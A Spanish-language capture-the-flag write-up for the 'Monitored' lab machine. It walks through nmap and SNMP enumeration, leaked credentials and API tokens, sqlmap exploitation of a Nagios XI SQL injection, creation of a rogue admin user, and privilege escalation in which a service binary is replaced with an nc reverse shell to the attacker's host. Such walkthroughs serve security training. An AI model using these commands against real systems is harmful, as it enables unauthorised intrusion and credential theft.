Monitored
OS: Linux
Dificultad: Medio
Puntos: 30
Nmap
TCP Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.248 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.10.11.248Nmap scan report for 10.10.11.248
Host is up, received syn-ack ttl 63 (0.072s latency).
Scanned at 2024-01-18 10:22:57 EST for 22s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/xFgJTbVC36GNHaE0GG4n/bWZGaD2aE7lsFUvXVdbINrl0qzBPVCMuOE1HNf0LHi09obr2Upt9VURzpYdrQp/7SX2NDet9pb+UQnB1IgjRSxoIxjsOX756a7nzi71tdcR3I0sALQ4ay5I5GO4TvaVq+o8D01v94B0Qm47LVk7J3mN4wFR17lYcCnm0kwxNBsKsAgZVETxGtPgTP6hbauEk/SKGA5GASdWHvbVhRHgmBz2l7oPrTot5e+4m8A7/5qej2y5PZ9Hq/2yOldrNpS77ID689h2fcOLt4fZMUbxuDzQIqGsFLPhmJn5SUCG9aNrWcjZwSL2LtLUCRt6PbW39UAfGf47XWiSs/qTWwW/yw73S8n5oU5rBqH/peFIpQDh2iSmIhbDq36FPv5a2Qi8HyY6ApTAMFhwQE6MnxpysKLt/xEGSDUBXh+4PwnR0sXkxgnL8QtLXKC2YBY04jGG0DXGXxh3xEZ3vmPV961dcsNd6Up8mmSC43g5gj2ML/E=
| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbeArqg4dgxZEFQzd3zpod1RYGUH6Jfz6tcQjHsVTvRNnUzqx5nc7gK2kUUo1HxbEAH+cPziFjNJc6q7vvpzt4=
| 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5o+WJqnyLpmJtLyPL+tEUTFbjMZkx3jUUFqejioAj7
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.56
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.56 ((Debian))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/localityName=Bournemouth/emailAddress=support@monitored.htb
| Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/localityName=Bournemouth/emailAddress=support@monitored.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-11-11T21:46:55
| Not valid after: 2297-08-25T21:46:55
| MD5: b36a:5560:7a5f:047d:9838:6450:4d67:cfe0
| SHA-1: 6109:3844:8c36:b08b:0ae8:a132:971c:8e89:cfac:2b5b
| -----BEGIN CERTIFICATE-----
| MIID/zCCAuegAwIBAgIUVhOvMcK6dv/Kvzplbf6IxOePX3EwDQYJKoZIhvcNAQEL
| BQAwgY0xCzAJBgNVBAYTAlVLMQ8wDQYDVQQIDAZEb3JzZXQxFDASBgNVBAcMC0Jv
| dXJuZW1vdXRoMRIwEAYDVQQKDAlNb25pdG9yZWQxHTAbBgNVBAMMFG5hZ2lvcy5t
| b25pdG9yZWQuaHRiMSQwIgYJKoZIhvcNAQkBFhVzdXBwb3J0QG1vbml0b3JlZC5o
| dGIwIBcNMjMxMTExMjE0NjU1WhgPMjI5NzA4MjUyMTQ2NTVaMIGNMQswCQYDVQQG
| EwJVSzEPMA0GA1UECAwGRG9yc2V0MRQwEgYDVQQHDAtCb3VybmVtb3V0aDESMBAG
| A1UECgwJTW9uaXRvcmVkMR0wGwYDVQQDDBRuYWdpb3MubW9uaXRvcmVkLmh0YjEk
| MCIGCSqGSIb3DQEJARYVc3VwcG9ydEBtb25pdG9yZWQuaHRiMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1qRRCKn9wFGquYFdqh7cp4WSTPnKdAwkycqk
| a3WTY0yOubucGmA3jAVdPuSJ0Vp0HOhkbAdo08JVzpvPX7Lh8mIEDRSX39FDYClP
| vQIAldCuWGkZ3QWukRg9a7dK++KL79Iz+XbIAR/XLT9ANoMi8/1GP2BKHvd7uJq7
| LV0xrjtMD6emwDTKFOk5fXaqOeODgnFJyyXQYZrxQQeSATl7cLc1AbX3/6XBsBH7
| e3xWVRMaRxBTwbJ/mZ3BicIGpxGGZnrckdQ8Zv+LRiwvRl1jpEnEeFjazwYWrcH+
| 6BaOvmh4lFPBi3f/f/z5VboRKP0JB0r6I3NM6Zsh8V/Inh4fxQIDAQABo1MwUTAd
| BgNVHQ4EFgQU6VSiElsGw+kqXUryTaN4Wp+a4VswHwYDVR0jBBgwFoAU6VSiElsG
| w+kqXUryTaN4Wp+a4VswDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOC
| AQEAdPGDylezaB8d/u2ufsA6hinUXF61RkqcKGFjCO+j3VrrYWdM2wHF83WMQjLF
| 03tSek952fObiU2W3vKfA/lvFRfBbgNhYEL0dMVVM95cI46fNTbignCj2yhScjIz
| W9oeghcR44tkU4sRd4Ot9L/KXef35pUkeFCmQ2Xm74/5aIfrUzMnzvazyi661Q97
| mRGL52qMScpl8BCBZkdmx1SfcVgn6qHHZpy+EJ2yfJtQixOgMz3I+hZYkPFjMsgf
| k9w6Z6wmlalRLv3tuPqv8X3o+fWFSDASlf2uMFh1MIje5S/jp3k+nFhemzcsd/al
| 4c8NpU/6egay1sl2ZrQuO8feYA==
|_-----END CERTIFICATE-----
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Nagios XI
5667/tcp open tcpwrapped syn-ack ttl 63
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernelUDP Scan
nmap -v -sU --min-rate=5000 10.10.11.248Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.25s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT STATE SERVICE
22/udp closed ssh
123/udp open ntp
161/udp open snmpEnumeration
Agregamos los host a nuestro archivo.
echo "10.10.11.248 monitored.htb nagios.monitored.htb" > /etc/hostsSe ecuentra un servicio nagios en el puerto 443.
https://nagios.monitored.htb/nagiosxi/login.phpFuzzing directorios encontramos nagios.
gobuster dir -u https://nagios.monitored.htb/ -w /usr/share/wordlists/dirb/common.txt -k
La aplicacion muestro un portal de autenticacion basica.
No se encontro nada relevante por el momento pero hay puertos udp abiertos.
nmap -v -sU --min-rate=5000 10.10.11.248Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.25s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT STATE SERVICE
22/udp closed ssh
123/udp open ntp
161/udp open snmpSNMP
snmp-check 10.10.11.248 -c publicEncontramos un usuario y password.
svc : XjH7VCehowpR1xZBLas credenciales funcionan para para acceder a https://nagios.monitored.htb/nagios/.
Si intentamos autenticarnos por el portal mostrara el siguiente mensaje.
NagiosXI API Auth
Es posible auntenticarse por medio de la api.
curl -POST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'{"username":"svc","user_id":"2","auth_token":"8550145cd6d8e5ab3170f873717c86b816778f05","valid_min":500,"valid_until":"Fri, 19 Jan 2024 16:20:02 -0500"}NagiosXI SQL Injection (CVE-2023-40931)
Nagios tiene una vulnerabilidad de sql injection.
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=8550145cd6d8e5ab3170f873717c86b816778f05" -p id
Dump database.
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=5b08bdcb90ebf9a8e10492ccb134e6e90810b9ee" -p id -D nagiosxi -T xi_users -C email,username,api_key,password --dump
NagiosXI API Key
Podemos crearnos un nuevo usuario admin con el api key.
curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=doom&password=doom&name=doom&email=doom@monitored.htb&auth_level=admin"{
"success": "User account doom was added successfully!",
"user_id": 10
}Ahora podemos acceder al panel de admin.
NagiosXI Command Execute
Para ejecutar comandos tenemos que hacerlo de la siguiente forma.
Ir a la ruta:
- Configure -> Core Config Manager
- Commands -> Add new
Ahora crearemos un servicio y ejecutaremos el comando.
- Monitoring -> Services -> Add new
Ejecutamos el comando y obtenermos reverse shell.
Privilege Escalation
Tenemos privilegios de sudo en varios comandos.
Escalaremos utilizando manage_services.sh en el servicio npcd.
nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/manage_services.sh status npcd
● npcd.service - Nagios Process Control Daemon
Loaded: loaded (/etc/systemd/system/npcd.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-01-19 08:53:47 EST; 2min 13s ago
Main PID: 19615 (npcd)
Tasks: 2 (limit: 4661)
Memory: 976.0K
CPU: 15ms
CGroup: /system.slice/npcd.service
├─19615 /bin/bash /usr/local/nagios/bin/npcd -f /usr/local/nagios/etc/pnp/npcd.cfg
└─19616 bash -iYa que este binario pertenece a nagios.
nagios@monitored:~$ find / -name npcd 2>/dev/null
/usr/local/nagios/bin/npcd
nagios@monitored:~$ ls -la /usr/local/nagios/bin/npcd
-rwxr-xr-x 1 nagios nagios 54 Jan 19 08:45 /usr/local/nagios/bin/npcdEjecutaremos los siguiente comandos para obtener reverse shell.
rm /usr/local/nagios/bin/npcd
echo -e '#!/bin/bash\nnc -c bash 10.10.14.133 4444' > /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
References
https://support.nagios.com/forum/viewtopic.php?f=16&t=58783
https://www.nagios.org/ncpa/help/2.2/api.html
https://outpost24.com/blog/nagios-xi-vulnerabilities/